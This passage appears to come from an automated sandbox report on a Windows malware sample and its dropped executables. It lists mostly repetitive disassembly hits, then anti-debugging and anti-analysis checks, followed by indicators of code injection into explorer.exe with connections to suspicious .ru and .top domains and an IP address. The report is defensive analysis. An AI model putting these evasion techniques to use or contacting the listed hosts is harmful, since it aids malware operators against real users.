Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57C707 mov ecx, dword ptr fs:[00000030h]		29_2_6B57C707
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h]		29_2_6B57C707
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]		29_2_6B546730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]		29_2_6B546730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]		29_2_6B546730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57E730 mov eax, dword ptr fs:[00000030h]		29_2_6B57E730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h]		29_2_6B56B73D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h]		29_2_6B56B73D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h]		29_2_6B544F2E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h]		29_2_6B544F2E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]		29_2_6B543FC5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]		29_2_6B543FC5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]		29_2_6B543FC5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h]		29_2_6B57D7CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h]		29_2_6B57D7CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5837F5 mov eax, dword ptr fs:[00000030h]		29_2_6B5837F5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]		29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov ecx, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]		29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D6652 mov eax, dword ptr fs:[00000030h]		29_2_6B5D6652
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B573E70 mov eax, dword ptr fs:[00000030h]		29_2_6B573E70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CE6C mov eax, dword ptr fs:[00000030h]		29_2_6B57CE6C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CE6C mov ecx, dword ptr fs:[00000030h]		29_2_6B57CE6C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]		29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]		29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]		29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]		29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D2E14 mov eax, dword ptr fs:[00000030h]		29_2_6B5D2E14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]		29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]		29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h]		29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FFE3F mov eax, dword ptr fs:[00000030h]		29_2_6B5FFE3F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57C63D mov eax, dword ptr fs:[00000030h]		29_2_6B57C63D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h]		29_2_6B54A63B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h]		29_2_6B54A63B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B580E21 mov eax, dword ptr fs:[00000030h]		29_2_6B580E21
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h]		29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5736CC mov eax, dword ptr fs:[00000030h]		29_2_6B5736CC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618ED6 mov eax, dword ptr fs:[00000030h]		29_2_6B618ED6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5716E0 mov ecx, dword ptr fs:[00000030h]		29_2_6B5716E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5576E2 mov eax, dword ptr fs:[00000030h]		29_2_6B5576E2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]		29_2_6B583EE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]		29_2_6B583EE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h]		29_2_6B583EE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]		29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]		29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h]		29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h]		29_2_6B543E80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h]		29_2_6B543E80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5C46A7 mov eax, dword ptr fs:[00000030h]		29_2_6B5C46A7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5D2EA3 mov eax, dword ptr fs:[00000030h]		29_2_6B5D2EA3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B567D50 mov eax, dword ptr fs:[00000030h]		29_2_6B567D50
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h]		29_2_6B54354C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h]		29_2_6B54354C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F8D47 mov eax, dword ptr fs:[00000030h]		29_2_6B5F8D47
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F3D40 mov eax, dword ptr fs:[00000030h]		29_2_6B5F3D40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h]		29_2_6B56C577
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h]		29_2_6B56C577
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54F51D mov eax, dword ptr fs:[00000030h]		29_2_6B54F51D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618D34 mov eax, dword ptr fs:[00000030h]		29_2_6B618D34
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54AD30 mov eax, dword ptr fs:[00000030h]		29_2_6B54AD30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]		29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]		29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h]		29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]		29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]		29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]		29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]		29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h]		29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]		29_2_6B603518
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]		29_2_6B603518
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h]		29_2_6B603518
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5FFDD3 mov eax, dword ptr fs:[00000030h]		29_2_6B5FFDD3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5415C1 mov eax, dword ptr fs:[00000030h]		29_2_6B5415C1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5495F0 mov eax, dword ptr fs:[00000030h]		29_2_6B5495F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5495F0 mov ecx, dword ptr fs:[00000030h]		29_2_6B5495F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5F8DF1 mov eax, dword ptr fs:[00000030h]		29_2_6B5F8DF1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5795EC mov eax, dword ptr fs:[00000030h]		29_2_6B5795EC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B543591 mov eax, dword ptr fs:[00000030h]		29_2_6B543591
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]		29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]		29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]		29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h]		29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]		29_2_6B571DB5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]		29_2_6B571DB5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B571DB5 mov eax, dword ptr fs:[00000030h]		29_2_6B571DB5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B5735A1 mov eax, dword ptr fs:[00000030h]		29_2_6B5735A1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618C75 mov eax, dword ptr fs:[00000030h]		29_2_6B618C75
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC77 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC77
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B585C70 mov eax, dword ptr fs:[00000030h]		29_2_6B585C70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57AC7B mov eax, dword ptr fs:[00000030h]		29_2_6B57AC7B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618450 mov eax, dword ptr fs:[00000030h]		29_2_6B618450
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B56746D mov eax, dword ptr fs:[00000030h]		29_2_6B56746D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B55FC01 mov eax, dword ptr fs:[00000030h]		29_2_6B55FC01
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B601C06 mov eax, dword ptr fs:[00000030h]		29_2_6B601C06
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B562430 mov eax, dword ptr fs:[00000030h]		29_2_6B562430
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B562430 mov eax, dword ptr fs:[00000030h]		29_2_6B562430
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h]		29_2_6B61740D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h]		29_2_6B61740D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B61740D mov eax, dword ptr fs:[00000030h]		29_2_6B61740D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544439 mov eax, dword ptr fs:[00000030h]		29_2_6B544439
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618C14 mov eax, dword ptr fs:[00000030h]		29_2_6B618C14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57BC2C mov eax, dword ptr fs:[00000030h]		29_2_6B57BC2C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B542CDB mov eax, dword ptr fs:[00000030h]		29_2_6B542CDB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]		29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]		29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]		29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57CCC0 mov eax, dword ptr fs:[00000030h]		29_2_6B57CCC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B6014FB mov eax, dword ptr fs:[00000030h]		29_2_6B6014FB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B618CD6 mov eax, dword ptr fs:[00000030h]		29_2_6B618CD6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54649B mov eax, dword ptr fs:[00000030h]		29_2_6B54649B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B54649B mov eax, dword ptr fs:[00000030h]		29_2_6B54649B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B619CB3 mov eax, dword ptr fs:[00000030h]		29_2_6B619CB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B541480 mov eax, dword ptr fs:[00000030h]		29_2_6B541480
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B544CB0 mov eax, dword ptr fs:[00000030h]		29_2_6B544CB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B57D4B0 mov eax, dword ptr fs:[00000030h]		29_2_6B57D4B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B604496 mov eax, dword ptr fs:[00000030h]		29_2_6B604496

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Md0q201V1D.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gbhudtb	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Md0q201V1D.exe

Code function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041D440

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe

Code function: 29_2_6B576B90 rdtsc

29_2_6B576B90

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Md0q201V1D.exe

Code function: 3_1_004026C8 LdrLoadDll,

3_1_004026C8

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\B096.exe

Memory allocated: page read and write | page guard

Jump to behavior

Contains functionality to register its own exception handler

Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 0_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0041D440
Source: C:\Users\user\Desktop\Md0q201V1D.exe	Code function: 0_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_004266D0
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 14_2_0041D440 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		14_2_0041D440
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 14_2_004266D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		14_2_004266D0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe	Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe	Domain query: znpst.top
Source: C:\Windows\explorer.exe	Network Connect: 216.128.137.31 80			Jump to behavior
